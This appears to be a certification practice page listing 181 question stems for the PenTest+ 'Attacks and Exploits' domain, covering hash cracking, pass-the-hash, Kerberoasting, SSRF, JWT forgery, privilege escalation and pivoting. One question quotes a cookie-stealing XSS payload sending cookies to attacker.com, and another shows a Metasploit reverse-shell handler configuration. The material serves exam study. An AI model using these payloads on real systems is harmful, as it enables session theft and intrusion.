Courseiva
Knowledge + Practice
CertificationsVendorsCareer RoadmapsLabs & ToolsStudy GuidesGlossaryPractice Questions
C
Courseiva

Free IT certification practice questions with explained answers for CCNA, CompTIA, AWS, Azure, Google Cloud, and more.

Certification Practice Questions

CCNA practice questionsSecurity+ SY0-701 practice questionsAWS SAA-C03 practice questionsAZ-104 practice questionsAZ-900 practice questionsCLF-C02 practice questionsA+ Core 1 practice questionsGoogle Cloud ACE practice questionsCySA+ CS0-003 practice questionsNetwork+ N10-009 practice questions
View all certifications →

Product

CertificationsCertification PathsExam TopicsPractice TestsExam Dumps vs Practice TestsStudy HubComparisons

Free Resources

Difficulty IndexLearn — Free ChaptersIT GlossaryFree Tools & LabsStudy GuidesCareer RoadmapsBrowse by VendorCisco Command ReferenceCCNA Scenarios

Company

AboutContactEditorial PolicyQuestion Writing PolicyTrust Center

Legal

Privacy PolicyTerms of Service

Courseiva is a free IT certification practice platform offering original exam-style practice questions, detailed explanations, topic-based practice, mock exams, readiness tracking, and study analytics for Cisco, CompTIA, Microsoft, AWS, and other technology certifications.

© 2026 Courseiva. Courseiva is operated by JTNetSolutions Ltd. All rights reserved.

Courseiva is an independent certification practice platform and is not affiliated with, endorsed by, or sponsored by Cisco, Microsoft, AWS, CompTIA, Google, ISC2, ISACA, or any other certification vendor. Vendor names and certification marks are used only to identify the exams learners are preparing for.

HomeCertificationsPT0-002DomainsAttacks and Exploits
PT0-002Free — No Signup

Attacks and Exploits

Practice PT0-002 Attacks and Exploits questions with full explanations on every answer.

181questions

Start practicing

Attacks and Exploits — choose a session length

10 questions~10 min20 questions~20 min30 questions~30 min50 questions~50 min

Free · No account required

PT0-002 Domains

Information Gathering and Vulnerability ScanningPlanning and ScopingReporting and CommunicationAttacks and ExploitsTools and Code Analysis

Practice Attacks and Exploits questions

10Q20Q30Q50Q

All PT0-002 Attacks and Exploits questions (181)

Start session

Click any question to see the full explanation and answer options, or start a focused practice session above.

1

A penetration tester is conducting an internal network assessment and wants to capture NTLMv2 hashes from Windows hosts without sending any authentication traffic. Which tool and attack technique should the tester use?

2

During a web application test, the tester discovers a parameter that reflects user input in the response without sanitization. Which type of vulnerability is most likely present?

3

A tester wants to exploit a Windows service running with SYSTEM privileges that has an unquoted service path containing spaces. Which technique should be used to escalate privileges?

4

A penetration tester is performing a password attack on a Windows domain and has captured NTLM hashes. Which tool can be used to perform a pass-the-hash attack to gain remote code execution on a target system?

5

During a web application test, the tester uses sqlmap and identifies a time-based blind SQL injection. Which technique is sqlmap using to extract data?

6

A penetration tester needs to escalate privileges on a Linux system and finds that the current user can run a specific command with sudo without a password. Which tool should the tester consult to find known exploitation techniques for that command?

7

A penetration tester is attempting to exploit a server-side request forgery (SSRF) vulnerability in a cloud-hosted web application to access the cloud metadata service. Which IP address should the tester target?

8

A tester has gained a low-privilege shell on a Windows machine and found that the user has the SeImpersonatePrivilege enabled. Which attack can be used to escalate privileges to SYSTEM?

9

A penetration tester wants to crack NTLM hashes obtained from a Windows domain. Which hashcat mode should the tester use?

10

During a penetration test, the tester discovers a JWT token that uses the 'alg:none' header. Which attack does this vulnerability enable?

11

A penetration tester has compromised a Linux host and wants to use it as a pivot point to access an internal network that is not directly reachable from the attacker's machine. Which tool can create a SOCKS proxy for routing traffic through the compromised host?

12

A tester is exploiting a vulnerable web application and wants to perform a UNION-based SQL injection to extract data. Which condition is necessary for a successful UNION attack?

13

A penetration tester is performing a Kerberoasting attack. Which TWO steps are required for a successful Kerberoasting attack?

14

A penetration tester is testing a web application and wants to exploit an XXE vulnerability to read sensitive files. Which TWO payloads could be used?

15

A penetration tester is performing lateral movement in a Windows domain after compromising a workstation. Which THREE techniques can be used to move to another machine?

16

During an internal penetration test, a tester wants to capture NTLMv2 hashes by poisoning LLMNR and NBT-NS traffic. Which tool should the tester use?

17

A penetration tester has successfully compromised a Windows machine and wants to perform lateral movement to another machine using captured NTLM hashes. Which tool would allow the tester to pass the hash and execute commands remotely?

18

During a penetration test, a tester identifies that a web application is vulnerable to Server-Side Request Forgery (SSRF). The tester attempts to access the AWS metadata endpoint to retrieve temporary credentials. Which IP address is commonly used for the cloud metadata endpoint?

19

A penetration tester is exploiting a SQL injection vulnerability in a login page. The tester wants to extract data from another table without returning data in the original query. Which SQL injection technique should the tester use?

20

A tester wants to crack NTLM hashes captured from a Windows domain. Which hashcat mode should be used for NTLM hashes?

21

During a Linux privilege escalation attempt, a tester finds a binary with the SUID bit set that is not on the GTFOBins list. The binary executes /bin/bash with the effective UID of root. What is the most likely way to exploit this?

22

A penetration tester is assessing a web application that uses JSON Web Tokens (JWT) for authentication. The tester discovers that the server does not validate the signature algorithm properly. Which attack should the tester attempt to forge a valid token?

23

Which Metasploit command is used to interact with an established session on a compromised host?

24

A tester is performing a Cross-Site Request Forgery (CSRF) attack on a web application that uses SameSite cookies. Which SameSite attribute value is most likely to prevent the attack?

25

During a Windows privilege escalation attempt, the tester finds that the current user has the SeImpersonatePrivilege enabled. Which tool is commonly used to exploit this privilege to gain SYSTEM?

26

A penetration tester has gained access to a Linux server and wants to move laterally to a Windows server. The tester captured a hash of a domain user. Which tool can be used to authenticate to the Windows server using the hash?

27

A tester is performing a Kerberoasting attack. After requesting TGS tickets, which hashcat mode should be used to crack them?

28

A penetration tester is conducting an internal network assessment. The tester wants to perform a man-in-the-middle attack to capture credentials. Which TWO tools can be used for ARP spoofing?

29

During a post-exploitation phase, a tester needs to establish persistence on a Windows target. Which THREE methods are commonly used for persistence on Windows?

30

A penetration tester is exploiting a web application and discovers an XML External Entity (XXE) vulnerability. Which TWO attacks can be performed using XXE?

31

A penetration tester is conducting a network attack and wants to intercept traffic between two hosts on the same local network by spoofing ARP responses. Which tool is specifically designed for this purpose?

32

During a penetration test, you capture NTLM hashes by poisoning LLMNR requests. Which tool would you use to exploit this and obtain the hashes?

33

After compromising a Linux host, you want to escalate privileges by exploiting a cron job that runs a script with root privileges. The script references an executable using a relative path. Which attack technique is most appropriate?

34

In a web application test, you find a parameter that directly references internal object IDs (e.g., user_id=123) and changing the ID allows access to another user's data. This vulnerability is known as:

35

During an internal penetration test, you need to perform lateral movement to a Windows target. You have a plaintext password for a domain user account. Which tool would be most appropriate to authenticate to the target using WMI?

36

You have obtained a NTLM hash of a domain admin account and want to authenticate to a remote server without cracking the password. Which technique enables you to authenticate using the hash?

37

A penetration tester is exploiting a SQL injection vulnerability in a web application. They want to extract data from the database without displaying it on the page. Which SQL injection technique should they use?

38

During a web application test, you discover a parameter that reflects user input in the response without proper encoding. You craft a payload that executes JavaScript in the victim's browser. This vulnerability is best classified as:

39

You are attacking a web application and notice that it makes requests to internal services. You attempt to access the cloud metadata endpoint at http://169.254.169.254/. Which vulnerability are you most likely exploiting?

40

After gaining initial access to a Windows host, you want to escalate privileges by exploiting a service that runs as SYSTEM but has an unquoted service path. What is the attack vector?

41

Which Metasploit command is used to display information about the current meterpreter session, including the target OS and user?

42

A penetration tester needs to crack a large number of NTLM hashes. They have a wordlist and want to apply common password mutations. Which hashcat option enables the use of a rule file to mutate words?

43

During a penetration test of a web application, you want to test for Cross-Site Request Forgery (CSRF) vulnerabilities. Which TWO conditions are necessary for a CSRF attack to succeed?

44

You have gained a foothold on a Linux server and identified a SUID binary that can be exploited to read arbitrary files. Which THREE techniques could be used to escalate privileges or gather sensitive information?

45

A penetration tester wants to pivot from a compromised Linux host to attack internal network resources that are not directly accessible. Which THREE tools or techniques can be used for pivoting?

46

During a penetration test, a tester captures NTLM hashes by spoofing LLMNR responses on the internal network. Which tool is most commonly used for this purpose?

47

A penetration tester wants to perform a pass-the-hash attack on a Windows target. Which tools can be used for this purpose? (Choose the best answer.)

48

During a web application test, the tester discovers that the application uses JSON Web Tokens (JWT) for authentication. The tester modifies the JWT header to set the algorithm to 'none' and removes the signature. The server accepts the token. What type of attack is this?

49

A penetration tester needs to escalate privileges on a Linux system and finds that the user can run a script with sudo that has a vulnerable argument. Which resource should the tester consult to find exploitation techniques for common sudo misconfigurations?

50

A penetration tester obtains a meterpreter session on a Windows target. Which command would the tester use to check the current user's privileges and potentially escalate privileges if SeImpersonatePrivilege is enabled?

51

During a penetration test, a tester wants to crack NTLM hashes captured from a Windows domain. Which hashcat mode should the tester use for NTLM hashes?

52

A penetration tester is performing a web application test and wants to exploit a SQL injection vulnerability to extract data from a database. The tester knows that the application returns results in the HTTP response. Which type of SQL injection is being used?

53

A penetration tester discovers a web application that fetches URLs from user input without proper validation. The tester targets the internal cloud metadata endpoint at 169.254.169.254 to retrieve instance credentials. Which type of attack is this?

54

A penetration tester wants to use Metasploit to exploit a remote service. After selecting an exploit module, which command is used to set the remote host IP address?

55

During a Windows privilege escalation attempt, a tester finds that the SeImpersonatePrivilege is enabled for the current user. Which tool can be used to escalate privileges to SYSTEM using this privilege?

56

A penetration tester is performing an ARP spoofing attack using Bettercap to intercept traffic between a client and the gateway. What is the primary goal of this attack?

57

A tester finds a Linux binary with the SUID bit set that is owned by root and can be executed by any user. The binary is known to have a vulnerability that allows arbitrary code execution. Which command does the tester use to find all SUID binaries on the system?

58

A penetration tester has compromised a Linux server and wants to establish persistence. Which TWO of the following methods are commonly used for persistence on Linux?

59

During a penetration test, a tester successfully exploits a web application and gains a foothold. The tester needs to pivot to an internal network segment that is not directly accessible. Which THREE tools can the tester use to create a SOCKS proxy or tunnel for pivoting?

60

A penetration tester is assessing an Active Directory environment and wants to perform Kerberoasting to obtain service account passwords. Which TWO conditions are required for a successful Kerberoasting attack?

61

A penetration tester is performing a network attack and wants to intercept traffic between two hosts on the same local network. Which technique should the tester use to redirect traffic through their machine?

62

During a penetration test, the tester captured an NTLM hash using Responder and wants to pass the hash to gain access to a remote Windows system. Which tool would be most appropriate to perform a pass-the-hash attack?

63

A penetration tester is performing a SQL injection test on a web application. The tester sends the payload ' OR '1'='1 and receives the same response as with a normal request. However, when sending ' OR '1'='2, the response differs. Which type of SQL injection is most likely present?

64

During a web application penetration test, the tester discovers a JWT token in the Authorization header. The token uses the 'none' algorithm. What attack should the tester attempt?

65

A tester has exploited a Linux system and gained a low-privilege shell. The tester runs 'sudo -l' and sees that the current user can run /usr/bin/find as root without a password. Which privilege escalation technique should the tester use?

66

A penetration tester is performing an NTLM relay attack against a Windows network. The tester uses ntlmrelayx to relay captured NTLM authentication attempts to a target server. What must be true for this attack to succeed?

67

After gaining a foothold on a Windows server, a tester wants to laterally move to another machine. The tester has obtained NTLM hashes and wants to execute commands remotely. Which tool is specifically designed for remote command execution using hashes via WMI?

68

During a penetration test, the tester discovers a Linux binary with the SUID bit set owned by root. The binary is a custom script that executes 'cp' to copy files. The tester can control the source file path via an environment variable. Which privilege escalation technique should the tester attempt?

69

A penetration tester wants to crack NTLM hashes captured during an internal test. Which hashcat mode should the tester use for NTLM hashes?

70

A tester is performing a web application test and discovers a parameter that seems to reflect input in the response. The tester attempts a reflected XSS payload but the application filters script tags. Which XSS variant should the tester try next?

71

During a penetration test, the tester gains a Meterpreter session on a Windows target and wants to escalate privileges to SYSTEM. The current user has the SeImpersonatePrivilege token. Which tool should the tester use to exploit this privilege?

72

A tester is performing a Kerberoasting attack. After requesting TGS tickets for accounts with SPNs, what is the next step to obtain plaintext credentials?

73

A penetration tester is performing a web application test and identifies an endpoint that is vulnerable to Server-Side Request Forgery (SSRF). Which of the following actions can the tester perform using this vulnerability? (Choose TWO.)

74

During a Windows privilege escalation attempt, a penetration tester discovers that the always elevated installation policy is enabled. Which of the following actions can the tester take to exploit this misconfiguration? (Choose TWO.)

75

A penetration tester is conducting a web application test and discovers an XML External Entity (XXE) vulnerability. Which of the following attacks can the tester perform using XXE? (Choose THREE.)

76

During a penetration test, a tester captures NTLMv2 hashes by spoofing LLMNR and NBT-NS responses on the internal network. Which tool is most commonly used for this type of attack?

77

A penetration tester has gained a low-privilege shell on a Windows server and discovers the user has the SeImpersonatePrivilege. Which tool could the tester use to escalate privileges to SYSTEM?

78

During a web application test, the tester discovers a parameter that reflects user input in the response without proper encoding. The tester crafts a payload that executes JavaScript when another user views the page. Which type of XSS is this, and what is a primary risk?

79

A penetration tester needs to crack NTLM hashes obtained from a Windows domain. The hashes are in the format used by Windows. Which hashcat mode should the tester use?

80

While testing a Linux system, the tester finds a binary with the SUID bit set owned by root. The binary executes a command based on user input without verifying the path. Which privilege escalation technique does this exemplify?

81

A penetration tester wants to perform a pass-the-hash attack against a Windows system using a captured NTLM hash. Which tool can be used to authenticate and execute commands remotely?

82

A tester identifies a SQL injection vulnerability in a login form. The application responds with different error messages for valid and invalid queries. Which type of SQL injection is most likely present, and what tool could automate exploitation?

83

During an internal penetration test, the tester wants to relay captured NTLM authentication to a server to gain access. Which tool from the Impacket suite is specifically designed for NTLM relay attacks?

84

A penetration tester gains a shell on a Linux server and needs to pivot to an internal network. The tester's attack machine can reach the compromised server but not the internal network. Which tool can create a SOCKS proxy on the compromised server?

85

A tester wants to crack a password hash using a wordlist combined with rules to generate variations. Which hashcat attack mode should be used?

86

A web application uses JSON Web Tokens (JWT) for authentication. The tester intercepts a token and decodes it to find the header contains "alg":"none". What vulnerability does this indicate, and how can it be exploited?

87

After compromising a Windows workstation, the tester wants to extract password hashes from the local SAM database. Which Metasploit meterpreter command should be used?

88

A penetration tester is conducting a web application test and discovers a server-side request forgery (SSRF) vulnerability. The application accepts a URL parameter and fetches the resource. Which TWO of the following are common SSRF exploitation techniques?

89

During a Windows privilege escalation attempt, the tester finds that the AlwaysInstallElevated registry key is set to 1. Which TWO actions can the tester perform to escalate privileges?

90

A penetration tester has gained initial access to a Linux server and wants to establish persistence. Which THREE of the following methods are commonly used for persistence on Linux systems?

91

A penetration tester runs the following command: `hashcat -m 1000 -a 0 hashes.txt rockyou.txt`. What type of attack is being performed?

92

During a penetration test, a tester captures NTLM hashes using Responder. Which of the following techniques would allow the tester to authenticate to a remote server without cracking the password?

93

A penetration tester is performing a web application test and discovers that the application reflects user input in the response without proper sanitization. However, the tester notices that the input is handled client-side via JavaScript. Which type of XSS is this?

94

A tester is exploiting a Linux system and finds a binary with the SUID bit set owned by root. The binary executes other commands. Which technique would allow privilege escalation to root?

95

A tester runs the following Metasploit commands: ``` msf6 > use exploit/multi/handler msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set LHOST 10.0.0.5 msf6 exploit(multi/handler) > set LPORT 4444 msf6 exploit(multi/handler) > run ``` What is the purpose of this configuration?

96

A tester wants to enumerate SMB shares and execute commands remotely on a Windows target using captured credentials. Which tool is most appropriate?

97

During a web application test, a tester discovers that the application uses JWTs for session management. The tester captures a JWT and notices the 'alg' header is set to 'none'. Which attack is the tester likely to perform?

98

A tester is performing a privilege escalation on a Windows system and finds that the user has SeImpersonatePrivilege enabled. Which tool could be used to escalate to SYSTEM?

99

A tester is attempting to crack WPA2 handshakes captured from a wireless network. Which hashcat mode should be used?

100

A tester is exploiting a SQL injection vulnerability in a login form. The application returns different responses for valid and invalid queries. However, the tester cannot see the database output. Which type of SQL injection is most likely?

101

During a penetration test, a tester gains initial access to a Linux server and wants to pivot to an internal network that is not directly accessible. Which of the following tools is specifically designed for creating SOCKS proxies for pivoting?

102

A tester is performing a web application test and finds an endpoint that accepts XML input. The tester sends a payload that includes an external entity referencing a local file. Which vulnerability is being tested?

103

A penetration tester is performing a full-scope engagement and needs to identify potential privilege escalation vectors on a Windows system. Which TWO of the following are valid Windows privilege escalation techniques?

104

During a web application penetration test, a tester wants to identify vulnerabilities that allow unauthorized access to internal resources. Which TWO of the following are commonly exploited to access internal services?

105

A penetration tester successfully compromises a web server and wants to establish persistence on the system. Which THREE of the following are effective persistence mechanisms on a Linux system?

106

During a penetration test, a tester runs the Responder tool on the internal network and captures an NTLMv2 hash. Which type of network attack is being performed?

107

A penetration tester wants to crack NTLM hashes obtained from a Windows system. Which Hashcat mode should be used?

108

During a web application test, a tester discovers that the application uses JSON Web Tokens (JWT) for authentication. The tester intercepts a JWT and changes the algorithm header to 'none' with an empty signature. Which attack is being attempted?

109

A penetration tester gains a low-privilege shell on a Linux server. The command 'sudo -l' reveals that the user can run /usr/bin/less as root without a password. Which tool would the tester likely use to escalate privileges?

110

During a penetration test, a tester uses Metasploit to exploit a Windows service and gets a meterpreter session. The tester wants to dump hashes from the compromised system. Which meterpreter command should be used?

111

A penetration tester is testing a web application and discovers an endpoint that returns XML data. The tester attempts to read /etc/passwd by injecting an external entity. Which type of attack is this?

112

While performing a web application penetration test, a tester observes that the application reflects user input in the page without proper sanitization. To steal session cookies, the tester crafts a payload like <script>document.location='http://attacker.com/?cookie='+document.cookie</script>. Which XSS type is this?

113

A penetration tester wants to perform a pass-the-hash attack against a Windows system. Which tool can be used to authenticate using the NTLM hash instead of a password?

114

During a post-exploitation phase, a tester has a foothold on a Linux server and wants to pivot to an internal web server that is not directly accessible. The tester has SSH access to the compromised server. Which command would create a local port forward to access the internal web server on port 80?

115

A penetration tester is performing a Kerberoasting attack. After requesting TGS tickets from a domain controller, which tool would be used to crack the tickets offline?

116

During a Windows privilege escalation attempt, a tester finds that the current user has the SeImpersonatePrivilege enabled. Which tool can be used to exploit this privilege to gain SYSTEM access?

117

A tester finds that a web application is vulnerable to Server-Side Request Forgery (SSRF). The tester wants to access the cloud metadata endpoint to obtain instance credentials. Which IP address is commonly used for the cloud metadata service?

118

A penetration tester has obtained a set of NTLM hashes from a Windows domain. The tester wants to perform lateral movement to other systems. Which TWO tools can be used for this purpose? (Select TWO.)

119

During a web application penetration test, a tester identifies a SQL injection vulnerability. Which TWO techniques could be used to extract data from the database? (Select TWO.)

120

A penetration tester has gained a foothold on a Linux server and wants to escalate privileges to root. Which THREE of the following are potential privilege escalation vectors? (Select THREE.)

121

During a penetration test, a tester captures NTLMv2 hashes using Responder. The tester then uses ntlmrelayx to relay the captured hashes to a target server. Which of the following best describes this attack technique?

122

A penetration tester is performing an internal assessment and wants to intercept network traffic to capture credentials. Which tool is specifically designed for ARP spoofing and can also perform SSL stripping?

123

A penetration tester has gained a low-privilege shell on a Windows server and discovered that the SeImpersonatePrivilege is enabled. Which of the following tools would be most appropriate to escalate privileges to SYSTEM-level access?

124

A tester is exploiting a web application and identifies a parameter that reflects user input in the response without sanitization. The tester wants to steal session cookies from other users. Which type of cross-site scripting (XSS) attack should the tester use?

125

A penetration tester is using Hashcat to crack NTLM hashes obtained from a Windows domain controller. Which hash mode should the tester specify for NTLM hashes?

126

During a web application test, a tester discovers that the application uses JSON Web Tokens (JWT) for authentication. The tester attempts to modify the 'alg' header to 'none' and sends the token. The server accepts the forged token. Which vulnerability is being exploited?

127

A penetration tester is performing an internal test and wants to move laterally from a compromised workstation to a domain controller. The tester has obtained NTLM hash for a domain admin. Which of the following tools would allow the tester to authenticate using the hash without cracking it?

128

A tester finds a Linux binary with the SUID bit set. The binary is owned by root and executes a shell command. The tester runs the binary and gets a root shell. Which command would the tester likely have used to discover this SUID binary?

129

A tester is performing an SQL injection attack on a login form. The tester inputs a single quote (') and receives a database error. The application returns different responses for true and false conditions. Which type of SQL injection is most likely occurring?

130

A tester is targeting a web application that makes server-side requests to internal resources based on user input. The tester attempts to access the AWS metadata endpoint at http://169.254.169.254/latest/meta-data/. The request returns sensitive cloud credentials. Which vulnerability is being exploited?

131

During a penetration test, a tester gains access to a Linux system and runs 'sudo -l', which reveals that the user can run /usr/bin/python with root privileges without a password. Which resource should the tester consult to find a method to escalate privileges using this configuration?

132

A tester wants to perform a Kerberoasting attack against an Active Directory domain. The tester has a domain account with no special privileges. Which of the following is required to successfully request TGS tickets for offline cracking?

133

A penetration tester has obtained a meterpreter session on a Windows target. The tester wants to escalate privileges to SYSTEM and then dump password hashes. Which two meterpreter commands should the tester use in sequence? (Choose TWO.)

134

A tester is performing a post-exploitation phase on a compromised Linux server and wants to establish persistence. Which THREE of the following methods are commonly used for Linux persistence? (Choose THREE.)

135

A penetration tester is exploiting a web application and discovers an endpoint that allows an attacker to read arbitrary files on the server by manipulating XML input. The application uses an XML parser that does not disable external entities. Which TWO attacks can the tester perform using this vulnerability? (Choose TWO.)

136

During a penetration test, you run the following command on a Linux target: `find / -type f -perm /4000 2>/dev/null`. What are you attempting to identify?

137

You have captured an NTLMv2 hash from a LLMNR poisoning attack using Responder. Which tool and mode would you use to attempt to crack the hash using a dictionary attack?

138

During a web application test, you discover an endpoint that accepts a URL parameter and fetches the content. You try `http://169.254.169.254/latest/meta-data/` and receive a response. Which vulnerability is this?

139

In a Windows domain, you have compromised a user account with SeImpersonatePrivilege enabled. Which tool or technique would best leverage this privilege to escalate to SYSTEM?

140

Which SQL injection technique involves injecting a query that causes a delay in response, allowing the attacker to infer information based on response time?

141

After exploiting a Linux server, you need to pivot to a restricted network subnet. You have SSH access to the compromised server. Which command would create a SOCKS proxy on the server to route traffic through it?

142

You are testing a web application and notice that it uses JSON Web Tokens (JWT) for authentication. You change the algorithm to 'none' and remove the signature, and the token is accepted. Which JWT vulnerability did you exploit?

143

During a penetration test, you successfully execute a Meterpreter session on a Windows target. You want to dump password hashes from the SAM database. Which Meterpreter command should you use?

144

In Metasploit, after searching for an exploit, you select it with 'use exploit/...' and set required options. What is the final command to execute the exploit against the target?

145

You are performing a password attack on a Linux system. You have obtained the /etc/shadow file. Which password cracking tool would be most efficient for a rule-based attack using a wordlist?

146

During a web application test, you find a feature that allows users to export data as PDF. The PDF generation uses user input without sanitization. You inject an XML external entity that reads /etc/passwd and the content appears in the PDF. Which vulnerability is present?

147

You are performing a penetration test and capture a Kerberos TGS ticket for a service account. What kind of attack can you perform offline to crack the service account password?

148

You are enumerating a Linux system for privilege escalation vectors. Which TWO conditions below could be exploited to escalate privileges? (Select TWO.)

149

During a web application penetration test, you find that the application is vulnerable to CSRF. Which TWO factors could prevent exploitation even if a CSRF vulnerability exists? (Select TWO.)

150

You have compromised a low-privileged Windows user and want to move laterally to a domain controller. Which THREE techniques could be used for lateral movement if you have valid credentials? (Select THREE.)

151

During a penetration test, a tester captures NTLMv2 hashes by spoofing LLMNR responses. Which tool is most commonly used for this purpose?

152

A penetration tester wants to perform a pass-the-hash attack against a Windows target. Which tools can be used to authenticate using an NTLM hash without knowing the plaintext password? (Choose the best option.)

153

During a web application test, a tester discovers a parameter that appears to be vulnerable to SQL injection. They want to extract data from a database using a technique that does not rely on visible output. Which type of SQL injection is most appropriate?

154

A penetration tester identifies a Linux binary with the SUID bit set. Which command can find all SUID binaries on a Linux system?

155

While exploiting a Windows machine, a tester gains a shell with limited privileges. They attempt to escalate privileges using a tool that exploits the SeImpersonatePrivilege. Which tool is specifically designed for this purpose on modern Windows versions?

156

A tester is performing a JWT attack and modifies the header to set the algorithm to 'none'. Which vulnerability are they exploiting?

157

After gaining initial access to a target, a tester wants to pivot to an internal network that is not directly accessible. Which technique can be used to forward traffic from the tester's machine through the compromised host to reach internal services?

158

A penetration tester needs to perform Kerberoasting against an Active Directory domain. Which step is required after requesting TGS tickets?

159

During a web application test, a tester discovers an endpoint that fetches a URL from user input without validation. They attempt to access the AWS metadata endpoint. Which IP address is commonly used for the cloud metadata service?

160

A tester exploits an XXE vulnerability to read local files. Which of the following is a typical XXE payload to read /etc/passwd?

161

After compromising a host, a tester wants to maintain persistence on a Windows system by executing a payload each time a user logs in. Which registry key is commonly used for this?

162

A tester is using Hashcat to crack NTLM hashes. They want to try all possible passwords consisting of exactly 8 lowercase letters. Which attack mode and mask should they use?

163

A penetration tester is performing a web application assessment. Which of the following are common techniques to identify and exploit IDOR vulnerabilities? (Select TWO.)

164

During a Linux privilege escalation attempt, a tester checks for misconfigurations that could allow running commands as root. Which of the following are potential vectors? (Select THREE.)

165

A penetration tester has gained a foothold in a Windows domain and wants to perform lateral movement. Which of the following tools or techniques can be used? (Select THREE.)

166

During a penetration test, a tester uses Responder to capture NTLM hashes from a Windows network. Which of the following protocols is MOST commonly targeted by Responder for poisoning?

167

A penetration tester gains a low-privilege shell on a Linux server. Using 'sudo -l', the tester finds that they can run '/usr/bin/vi' as root without a password. Which technique would the tester MOST likely use to escalate privileges?

168

During a web application test, a tester discovers a JWT token with the following header: {'alg':'HS256','typ':'JWT'}. The token payload contains 'admin':false. The tester attempts to change the algorithm to 'none' and removes the signature. Which vulnerability is being exploited?

169

A penetration tester uses Hashcat to crack NTLM hashes captured during a pass-the-hash attack. Which Hashcat mode should the tester use for NTLM hashes?

170

A penetration tester has compromised a Windows machine and wants to perform lateral movement to another machine on the same network. The tester has obtained NTLM hashes, but not plaintext passwords. Which TWO tools can be used for pass-the-hash attacks?

171

During a Linux privilege escalation assessment, the tester finds that a binary with SUID root can execute arbitrary commands. Which TWO of the following methods are MOST likely to exploit this?

172

A penetration tester is conducting a web application test and finds a parameter that is vulnerable to XXE. Which THREE of the following actions can the tester perform using XXE?

173

A penetration tester is using Metasploit to exploit a remote Windows service. After a successful exploit, the tester gets a meterpreter session. Which TWO commands can the tester use to gather system information and credentials?

174

A penetration tester is performing post-exploitation on a compromised Linux server and wants to maintain persistence. Which TWO of the following methods are commonly used for Linux persistence?

175

During a penetration test, the tester discovers a web application vulnerable to CSRF. The application uses SameSite cookies set to 'Lax'. Which THREE methods might the tester use to exploit the CSRF vulnerability?

176

A penetration tester is using Hashcat to crack password hashes. Which TWO attack modes are commonly used?

177

During a Windows privilege escalation attempt, the tester finds that the current user has SeImpersonatePrivilege enabled. Which THREE tools or techniques can be used to exploit this privilege?

178

A penetration tester is performing a web application test and identifies a potential SQL injection vulnerability. Which TWO methods can the tester use to confirm the vulnerability and extract data?

179

During a penetration test, the tester gains access to a domain-joined Windows machine and wants to perform Kerberoasting. Which THREE conditions are necessary for a successful Kerberoasting attack?

180

A penetration tester is using Metasploit to pivot from a compromised host to an internal network. Which THREE Metasploit features can facilitate pivoting?

181

A penetration tester has gained initial access to an internal Windows server and wants to escalate privileges to SYSTEM. The tester identified that the current user has the SeImpersonatePrivilege enabled. Which TWO of the following tools or techniques would be most appropriate to exploit this privilege for privilege escalation?

Practice all 181 Attacks and Exploits questions

Other PT0-002 exam domains

Information Gathering and Vulnerability ScanningPlanning and ScopingReporting and CommunicationTools and Code Analysis

Frequently asked questions

What does the Attacks and Exploits domain cover on the PT0-002 exam?

The Attacks and Exploits domain covers the key concepts tested in this area of the PT0-002 exam blueprint published by CompTIA. Courseiva provides free domain-focused practice, mock exams, missed-question review, and readiness tracking across all PT0-002 domains — no account required.

How many Attacks and Exploits questions are in the PT0-002 question bank?

The Courseiva PT0-002 question bank contains 181 questions in the Attacks and Exploits domain. Click any question to see the full explanation and answer breakdown.

What is the best way to practice Attacks and Exploits for PT0-002?

Start with a 10-question focused session to identify your baseline accuracy in this domain. Read every explanation — even for questions you answer correctly — to understand the reasoning. Once you score consistently above 80%, move to a 20–30 question session to confirm depth before moving to the next domain.

Can I practice only Attacks and Exploits questions for PT0-002?

Yes — the session launcher on this page draws questions exclusively from the Attacks and Exploits domain. Choose 10, 20, 30, or 50 questions for a focused session, or click individual questions to review them one by one.

Free forever · No credit card required

Track your PT0-002 domain progress

Save your results, see per-domain analytics, and get readiness scores — free, for every certification.

Sign Up Free

Free forever · Every certification included

Practice Session

10 questions20 questions30 questions50 questions

Study Resources

All DomainsPractice TestMock ExamFlashcardsStudy Guide

Related Exams

CS0-003SY0-701CEH